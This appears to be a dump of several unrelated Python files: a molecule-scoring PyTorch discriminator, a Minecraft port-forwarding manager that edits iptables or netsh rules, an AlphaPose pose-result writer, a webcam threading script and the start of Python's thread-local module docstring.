output= F.sigmoid(self.predict(x))
return output
def create_discriminator(init_len, n_hidden, device):
"""
Define an instance of the discriminator
"""
n_hidden.insert(0, init_len)
net = Net(n_feature=init_len, h_sizes=n_hidden, n_output=1).to(device)
optimizer = torch.optim.Adam(net.parameters(), lr=0.001, weight_decay=1e-4)
loss_func = torch.nn.BCELoss()
return (net, optimizer, loss_func)
def obtain_initial_discriminator(disc_layers, device):
''' Obtain Discriminator initializer
Parameters:
disc_enc_type (str) : (smile/selfie/properties_rdkit)
For calculating num. of features to be shown to discrm.
disc_layers, (list) : Intermediate discrm layers (e.g. [100, 10])
device (str) : Device discrm. will be initialized
Returns:
discriminator : torch model
d_optimizer : Loss function optimized (Adam)
d_loss_func : Loss (Cross-Entropy )
'''
# Discriminator initialization
discriminator, d_optimizer, d_loss_func = create_discriminator(51, disc_layers, device)
return discriminator, d_optimizer, d_loss_func
def do_x_training_steps(data_x, data_y, net, optimizer, loss_func, steps, graph_x_counter, device):
data_x = torch.tensor(data_x.astype(np.float32), device=device)
data_y = torch.tensor(data_y, device=device, dtype=torch.float)
net.train()
for t in range(steps):
predictions = net(data_x)
loss = loss_func(predictions, data_y.reshape(len(data_y), 1))
if t % 400 == 0:
print(' Epoch:{} Loss:{}'.format(t, loss.item()))
optimizer.zero_grad()
loss.backward(retain_graph=True)
optimizer.step()
return net
def save_model(model, generation_index, dir_name):
out_dir = './{}/{}'.format(dir_name, generation_index)
if not os.path.isdir(out_dir):
os.system('mkdir {}'.format(out_dir))
torch.save(model, out_dir+'/model')
def load_saved_model(generation_index):
# model = torch.load('./RESULTS/{}/model'.format(generation_index))
# model = model.eval()
# return model
#
model = pickle.load(open('sarsmodel.pkl', 'rb'))
model = model.model
return model
def do_predictions(discriminator, data_x, device):
discriminator = discriminator.eval()
data_x = torch.tensor(data_x.astype(np.float32), device=device)
outputs = discriminator(data_x)
predictions = outputs.detach().cpu().numpy() # Return as a numpy array
return (predictions)
def train_and_save_model(smiles_ls, pro_val, generation_index):
dataset_x = obtain_discr_encoding(smiles_ls, num_processors=1) # multiprocessing.cpu_count()
avg_val = np.percentile(pro_val, 80) # np.average(pro_val)
dataset_y = np.array([1 if x>=avg_val else 0 for x in pro_val ])
disc_layers = [100, 10]
device = 'cpu'
discriminator, d_optimizer, d_loss_func = obtain_initial_discriminator(disc_layers, device)
discriminator = do_x_training_steps(data_x=dataset_x, data_y=dataset_y, net=discriminator, optimizer=d_optimizer, loss_func=d_loss_func, steps=2000, graph_x_counter=1, device=device)
# Save discriminator after training
save_model(discriminator, generation_index=generation_index, dir_name='RESULTS')
def obtain_new_pred(smiles_ls, generation_index):
predictions = []
model = load_saved_model(generation_index=generation_index)
for i,smi in enumerate(smiles_ls):
if i % 10000 == 0:
print(' Predicting: {}/{}'.format(i, len(smiles_ls)))
# data_x = obtain_discr_encoding([smi], 1)
# data_x = torch.tensor(data_x.astype(np.float32), device='cpu')
# outputs = model(data_x)
# out_ = outputs.detach().cpu().numpy()
# predictions.append(float(out_[0]))
data_x = obtain_discr_encoding([smi], 1)
data_x = torch.tensor(data_x.astype(np.float32), device='cpu')
# outputs = model(data_x)
outputs = model.predict(data_x)
out_ = outputs #.detach().cpu().numpy()
predictions.append(float(out_[0]))
return predictions
|
mineportproxy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###################################################
#........../\./\...___......|\.|..../...\.........#
#........./..|..\/\.|.|_|._.|.\|....|.c.|.........#
#......../....../--\|.|.|.|i|..|....\.../.........#
# Mathtin (c) #
###################################################
# Author: Daniel [Mathtin] Shiko #
# Copyright (c) 2020 <wdaniil@mail.ru> #
# This file is released under the MIT license. #
###################################################
__author__ = 'Mathtin'
import subprocess
import platform
import logging
import logging.config
import os
import sys
import re
import time
import threading
import psutil
import argparse
# Determine which OS we are running
PLATFROM = platform.system()
# Include netcat instances as game instances (for testing purpose)
# Switched via args
INCLUDE_NETCAT = False
# Basic seperate log config (level switched via args)
LOGGING_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'INFO',
'formatter': 'standard',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stderr',
},
},
'loggers': {
'mineportproxy': {
'handlers': ['default'],
'level': 'INFO'
},
}
}
# module logger (setup in main)
log = None
#############
## UTILITY ##
#############
def binary_exists(program):
''' Check if binary file exists (by full path or in PATH env variable)
Parameters:
program (str): binary file name (or full path name)
Returns:
bool: True if binary exists
'''
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(program)
if fpath:
if is_exe(program):
return True
else:
for path in os.environ['PATH'].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return True
return False
def shell(cmd, timeout=1):
''' Evaluates command and returns piped stdout and stderr. Note: returns (None, None) on timeout
Parameters:
cmd (str): shell command to evaluate
timeout (float): communicate timeout in seconds (default: 1 sec)
Returns:
(bytes, bytes): stdout and stderr output of commmand
'''
#log.debug('Executing: %s' % cmd)
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
try:
return proc.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
proc.kill()
return None, None
platform_specific_lib = {}
def platform_specific(pl):
''' Parametric decorator adding function only on specified OS name
Parameters:
pl (str): OS name
Returns:
decorator: actual decorator to gather function
'''
def wrapper(func):
name = func.__name__
if pl == PLATFROM:
platform_specific_lib[name] = func
elif name not in platform_specific_lib:
def unimplemented(*args, **kwargs):
raise Exception('%s in not implemented for current platform' % name)
platform_specific_lib[name] = unimplemented
return func
return wrapper
def bind_platform_funcs():
'''Bind decorated platform specific functions to current module'''
current_module = __import__(__name__)
for name in platform_specific_lib.keys():
setattr(current_module, name, platform_specific_lib[name])
def check_platform_support():
''' Checks if current OS capable of running this script
Returns:
bool: True if capable
'''
log.debug('Checking for platform support')
log.debug('Detected platform: %s' % PLATFROM)
if PLATFROM not in ['Linux', 'Windows']:
log.error('Unsupported platfrom: %s' % platform.platform())
return False
if PLATFROM == 'Windows':
win_ver = platform.win32_ver()[0]
log.debug('Detected Windows version: %s' % win_ver)
# netsh with portproxy available on Windows 7 and above
if win_ver not in ['7', '8', '8.1', '10']:
log.error('Unsupported Windows version: %s' % platform.platform())
return False
# netsh needs elevated shell
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin()
log.debug('Running elevated' if is_admin else 'Running not elevated')
if is_admin == 0:
log.error('netsh requires elevation')
log.error('Run script as administrator')
return False
if PLATFROM == 'Linux':
# check neccessary binaries availability
if binary_exists('iptables') is None:
log.error('iptables not found')
return False
log.debug('iptable present')
if binary_exists('iptables-save') is None:
log.error('iptables-save not found')
return False
log.debug('iptables-save present')
if binary_exists('netstat') is None:
log.error('netstat not found')
return False
log.debug('netstat present')
# check iptables output to determine if current user actually have rights to change firewall settings
_, nat_err = shell('iptables -t nat -L')
if nat_err is None: # kali linux iptables stuck on non-root user for some reason
log.error('iptables not responding')
log.error('Probably need to restart as root')
return False
# WSL 1 response with such error
if b'Table does not exist' in nat_err:
log.error('Kernel does not support forwarding')
return False
# Obvious insufficient permissions
if b'Permission denied' in nat_err:
log.error('Insufficient permissions to modify iptables rules')
log.error('Restart script as root')
return False
log.debug('iptables output accepted')
# check iptables-save output to determine if current user actually have rights to dump firewall settings
nat_out, nat_err = shell('iptables-save')
if nat_err is None or nat_out == b'': # WSL 1 gives empy response here :/
log.error('iptables-save not responding')
log.error('Probably need to restart as root')
return False
# Obvious insufficient permissions
if b'Permission denied' in nat_err:
log.error('Insufficient permissions to dump iptables rules')
log.error('Restart script as root')
return False
log.debug('iptables-save output accepted')
# check netstat output to determine if current user have rights to run netstat and id PIDs
netstat_out, _ = shell('netstat -lntp')
if netstat_out is None or netstat_out == b'':
log.error('netstat not responding')
log.error('Probably need to restart as root')
return False
try:
lines = [l for l in netstat_out.decode('utf-8').splitlines() if 'LISTEN' in l]
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(netstat_out)
return False
if len(lines) == 0:
log.warning('No listening sockets detected via netstat. Can not determine if netstat works properly.')
log.info('Opening listening socket to recheck netstat')
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind((socket.gethostname(), 8789))
netstat_out, _ = shell('netstat -lntp')
serversocket.close()
if netstat_out is None or netstat_out == b'':
log.error('netstat not responding')
log.error('Probably need to restart as root')
return False
try:
lines = [l for l in netstat_out.decode('utf-8').splitlines() if 'LISTEN' in l]
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(netstat_out)
return False
if len(lines) == 0:
log.error('No listening sockets detected via netstat')
log.error('Probably need to restart as root')
return False
for line in lines:
line = [l for l in line.split(' ') if l]
if line[-1] == '-':
log.error('Insufficient permissions to identify pids with netstat')
log.error('Restart script as root')
return False
log.debug('netstat output accepted')
# check if ip forwarding enabled
cat_out, cat_err = shell('cat /proc/sys/net/ipv4/ip_forward')
if cat_err is None: # WTF
log.error('cat not responding')
return False
if b'Permission denied' in cat_err:
log.error('Insufficient permissions to check /proc/sys/net/ipv4/ip_forward')
return False
if b'1' not in cat_out:
log.error('IP forwarding disabled. Enable it with `echo "1" > /proc/sys/net/ipv4/ip_forward`')
return False
log.debug('ip forwarding enabled')
log.debug('Current platform is supported')
return True
#######################
## PLATFORM SPECIFIC ##
#######################
@platform_specific('Linux')
def get_rule(from_port, to_port):
''' Get rule tuple from firewall rules dump
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
Returns:
(int, int, str, Any): rule tuple (from_port, to_port, source addr, rules)
'''
cmd = 'iptables-save'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd)
if err is None:
log.error('iptables-save not responding')
return None
elif len(err) > 2:
log.error('IPTABLES-SAVE ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from iptables-save')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
# extract NAt table (from *nat line till COMMIT line)
try:
dump = out.decode('utf-8')
rule_lines = dump[dump.index('*nat'):]
rule_lines = dump[:dump.index('COMMIT')].splitlines()
except UnicodeDecodeError:
log.error('Cannot decode iptables-save output')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
except ValueError:
log.error('Cannot find NAT table in iptables-save output')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
# resulting variables (iport, oport, oaddr, rules)
iport, oport, oaddr, rules = None, None, '127.0.0.1', []
# filter NAT table
for line in rule_lines:
if ('--dport %d' % from_port) in line and ('--to-ports %d' % to_port) in line and '-s 127.0.0.1' in line:
rules.append(line)
# return found rules
log.debug('Get rule for [%d, %d]: %s' % (from_port, to_port, str(rules)))
if len(rules) > 1:
iport = int(re.search(r'--dport (\d+)', rules[0]).group(1))
oport = int(re.search(r'--to-ports (\d+)', rules[0]).group(1))
return (iport, oport, oaddr, rules)
return None
@platform_specific('Windows')
def get_rule(from_port, to_port):
''' Get rule tuple from firewall rules dump
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
Returns:
(int, int, str, Any): rule tuple (from_port, to_port, source addr, rules)
'''
cmd = 'netsh interface portproxy dump'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd)
if err is None:
log.error('netsh not responding')
return None
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netsh')
log.error('NETSH OUTPUT:')
log.error(out)
return None
# extract portproxy rules (from reset line till popd line)
try:
dump = out.decode('utf-8')
rule_lines = dump[dump.index('reset'):dump.index('popd')].splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netsh output')
log.error('NETSH OUTPUT:')
log.error(out)
return None
except ValueError:
log.error('Cannot find rules in portproxy dump')
log.error('NETSH OUTPUT:')
log.error(out)
return None
# find rule
for line in rule_lines:
if ('listenport=%d' % from_port) in line and ('connectport=%d' % to_port):
log.debug('Get rule for [%d, %d]: "%s"' % (from_port, to_port, line))
iport = int(re.search(r'listenport=(\d+)', line).group(1))
oport = int(re.search(r'connectport=(\d+)', line).group(1))
oaddr = re.search(r'connectaddress=([0-9.]+)', line).group(1)
return (iport, oport, oaddr, line)
return None
@platform_specific('Linux')
def add_rule(from_port, to_port):
''' Add port forwarding rule
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
'''
cmd = 'iptables -t nat -A PREROUTING -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
log.warning(err)
cmd = 'iptables -t nat -A OUTPUT -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
log.warning(err)
@platform_specific('Windows')
def add_rule(from_port, to_port):
''' Add port forwarding rule
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
'''
cmd = 'netsh interface portproxy add v4tov4 listenport=%d listenaddress=0.0.0.0 connectport=%d connectaddress=127.0.0.1'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('netsh not responding')
return
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) > 4:
log.warning('NETSH OUTPUT:')
log.warning(err)
@platform_specific('Linux')
def drop_rule(rule):
''' Drop port forwarding rule
Parameters:
from_port (rule_tuple): rule which will be dropped from NAT table
'''
cmd = 'iptables -t nat -D PREROUTING -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (rule[0], rule[1]))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
log.warning(err)
cmd = 'iptables -t nat -D OUTPUT -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
out, err = shell(cmd % (rule[0], rule[1]))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
log.warning(err)
@platform_specific('Windows')
def drop_rule(rule):
''' Drop port forwarding rule
Parameters:
from_port (rule_tuple): rule which will be dropped from NAT table
'''
cmd = 'netsh interface portproxy delete v4tov4 listenport=%d listenaddress=0.0.0.0'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (rule[0]))
if err is None:
log.error('netsh not responding')
return
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) > 4:
log.warning('NETSH OUTPUT:')
log.warning(err)
@platform_specific('Linux')
def get_listening_ports(pid):
''' Get listening ports of specified process
Parameters:
pid (int): process PID
Returns:
list: list of listening ports
'''
cmd = 'netstat -nltp'
out, err = shell(cmd)
if err is None:
log.error('netstat not responding')
return
elif len(err) > 2:
log.error('NETSTAT ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netstat')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
ports = set()
try:
lines = out.decode('utf-8').splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
# parse netstat ouput
for line in lines:
if 'tcp' not in line or 'LISTEN' not in line:
continue
# parse netstat line as table row
row = [x for x in line.split(' ') if x]
if row[-1].split('/')[0] == str(pid): # last column is PID/ProcessName
ports.add(int(row[3].split(':')[-1])) # fourth column is addr:port
return list(ports)
@platform_specific('Windows')
def get_listening_ports(pid):
''' Get listening ports of specified process
Parameters:
pid (int): process PID
Returns:
list: list of listening ports
'''
cmd = 'netstat.exe -ano'
out, err = shell(cmd, timeout=2)
if err is None:
log.error('netstat not responding')
return
elif len(err) > 2:
log.error('NETSTAT ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netstat')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
ports = set()
try:
lines = out.decode('utf-8').splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
# parse netstat ouput
for line in lines:
if 'TCP' not in line or 'LISTENING' not in line:
continue
# parse netstat line as table row
row = [x for x in line.split(' ') if x]
if row[-1] == str(pid): # last column is PID
ports.add(int(row[1].split(':')[-1])) # second column is addr:port
return list(ports)
def get_game_processes():
''' Get running game instances (includes netcat instances if INCLUDE_NETCAT flag enabled)
Returns:
list: list of PIDs of running game instances
'''
games = []
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
# assume minecraft runned by java process with word 'minecraft' in args
if 'java' in pinfo['name']:
for arg in proc.cmdline():
if 'minecraft' in arg.lower():
games.append(pinfo)
break
if INCLUDE_NETCAT and ('nc.exe' == pinfo['name'] or 'nc' == pinfo['name']):
games.append(pinfo)
except (OSError, psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return games
#############################
## MINE PORT PROXY MANAGER ##
#############################
class MinePortProxy(object):
''' Port Proxy Manager
Workflow loop:
* filter_old_instances
* load_new_instances
* sleep timeout
Expects close method call to drop all added firewall rules
'''
def __init__(self, port_start=25565, port_end=None):
''' MinePortProxy Constructor
Parameters:
port_start (int): port pool minimum value (default: 25565)
port_end (int): port pool maximum value (default: port_end)
'''
super().__init__()
if port_end is None:
port_end = port_start
self.instances = []
self.pids = []
self.port_pool = set(range(port_start, port_end+1))
def filter_old_instances(self):
''' Drops rules for non-existent listening ports associated with game instances '''
live_instances = []
live_pids = []
for pid, rule in self.instances:
for _ in range(4):
ports = get_listening_ports(pid)
if ports is not None:
break
if ports is None:
log.warning('Can not get listening ports for PID %d' % pid)
log.warning('Keeping rule (%d -> %d) alive' % (rule[0], rule[1]))
live_instances.append((pid, rule))
live_pids.append(pid)
continue
if len(ports) == 0 or ports[0] != rule[1]: # assume that instance listens only one port
drop_rule(rule)
self.port_pool.add(rule[0])
log.info('Old instance (pid %d) dropped (rule %d -> %d)' % (pid, rule[0], rule[1]))
else:
#log.debug('Instance (pid %d) alive (rule %d -> %d)' % (pid, rule[0], rule[1]))
live_instances.append((pid, rule))
live_pids.append(pid)
self.instances = live_instances
self.pids = live_pids
def load_new_instances(self):
''' Create missing rules for listening ports associated with game instances '''
for game in get_game_processes():
pid = game['pid']
if pid in self.pids:
continue
ports = get_listening_ports(pid)
if ports is None:
log.warning('Can not get listening ports for PID %d' % pid)
continue
if len(ports) == 0:
continue
if len(self.port_pool) == 0:
log.info('Cannot load new instance (pid %d), not enough ports' % pid)
continue
from_port = self.port_pool.pop()
to_port = ports[0] # assume that instance listens only one port
add_rule(from_port, to_port)
rule = get_rule(from_port, to_port)
if rule is None:
log.error('Failed to add rule %d -> %d' % (from_port, to_port))
self.port_pool.add(from_port)
continue
self.instances.append((pid, rule))
self.pids.append(pid)
log.info('New instance (pid %d) added (rule %d -> %d)' % (pid, rule[0], rule[1]))
def close(self):
''' Drops all created rules '''
for _, rule in self.instances:
drop_rule(rule)
self.port_pool.add(rule[0])
self.instances = []
self.pids = []
class MinePortProxyThreaded(MinePortProxy):
''' Threaded Manager extends Proxy Manager with threaded start/stop functionality '''
def __init__(self, *args):
''' MinePortProxyThreaded Constructor
Parameters:
port_start (int): port pool minimum value (default: 25565)
port_end (int): port pool maximum value (default: port_end)
'''
super().__init__(*args)
self.thread = threading.Thread(target=self.__thread_loop, args=())
self.stop_event = threading.Event()
self.started = False
def __thread_loop(self):
while not self.stop_event.is_set():
self.filter_old_instances()
self.load_new_instances()
time.sleep(1)
self.close()
def start(self):
''' Starts manager in seperate thread '''
if self.started == True:
raise Exception('MinePortProxyDaemon already started')
self.started = True
self.thread.start()
def stop(self):
''' Stops manager '''
if self.started == False:
raise Exception('MinePortProxyDaemon is not started')
self.stop_event.set()
self.thread.join()
self.started = False
self.stop_event.clear()
def set_log_level(lvl):
LOGGING_CONFIG['handlers']['default']['level'] = lvl
LOGGING_CONFIG['loggers']['mineportproxy']['level'] = lvl
def main(argv):
parser = argparse.ArgumentParser(description='Starts MinePortProxy manager')
parser.add_argument('-d', '--debug', action='store_true', help='enables debug output and INCLUDE_NETCAT flag')
parser.add_argument('-l', '--log-level', nargs=1, default=['INFO'], help='sets log level')
parser.add_argument('port_start', nargs='?', type=int, default=25565, help='port pool minimum value')
parser.add_argument('port_end', nargs='?', type=int, default=None, help='port pool maximum value')
args = parser.parse_args(argv[1:])
if args.log_level[0] not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
print('Bad log level argument')
parser.print_help()
return - 1
set_log_level(args.log_level[0])
if args.debug:
set_log_level('DEBUG')
global INCLUDE_NETCAT
INCLUDE_NETCAT = True
port_start = args.port_start
port_end = port_start
if args.port_end is not None:
port_end = args.port_end
if port_start > port_end or port_start < 1 or port_end > 65534:
print('Invalid port range')
parser.print_help()
return - 1
# ARGUMENT PARSING ENDS HERE
global log
logging.config.dictConfig(LOGGING_CONFIG)
log = logging.getLogger('mineportproxy')
if check_platform_support() is False:
log.critical('Unsupported platform')
return - 1
manager = MinePortProxyThreaded(port_start, port_end)
log.info('Starting MinePortProxy manager')
manager.start()
while True:
try:
inp = input()
if inp == 'quit' or inp == 'q':
break
except KeyboardInterrupt:
break
log.info('Stopping MinePortProxy manager')
manager.stop()
return 0
bind_platform_funcs()
if __name__ == '__main__':
res = main(sys.argv)
exit(res)
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, json_name, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.json_name = json_name
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, self.json_name, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
Threads.py
|
from threading import Thread
from random import randint
import time,cv2
import hashlib
from collections import deque
class MyThread(object):
def __init__(self):
self.frame = deque(maxlen=5)
def run(self):
self.cap = cv2.VideoCapture(0)
while(True):
ret, lframe = self.cap.read()
#print("LFRAME:",lframe)
if ret:
self.frame.append(lframe)
def get_frame(self):
try:
return self.frame.popleft()
except IndexError:
return None
if __name__ == '__main__':
myThreadOb1 = MyThread()
th = Thread(target=myThreadOb1.run)
th.start()
while(True):
image = myThreadOb1.get_frame()
print("IMAGE:",image)
if image:
cv2.imshow('video', image)
else:
time.sleep(1)
#import ipdb; ipdb.set_trace()
myThreadOb1.join()
cv2.destroyAllWindows()
print('Main Terminating...')
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
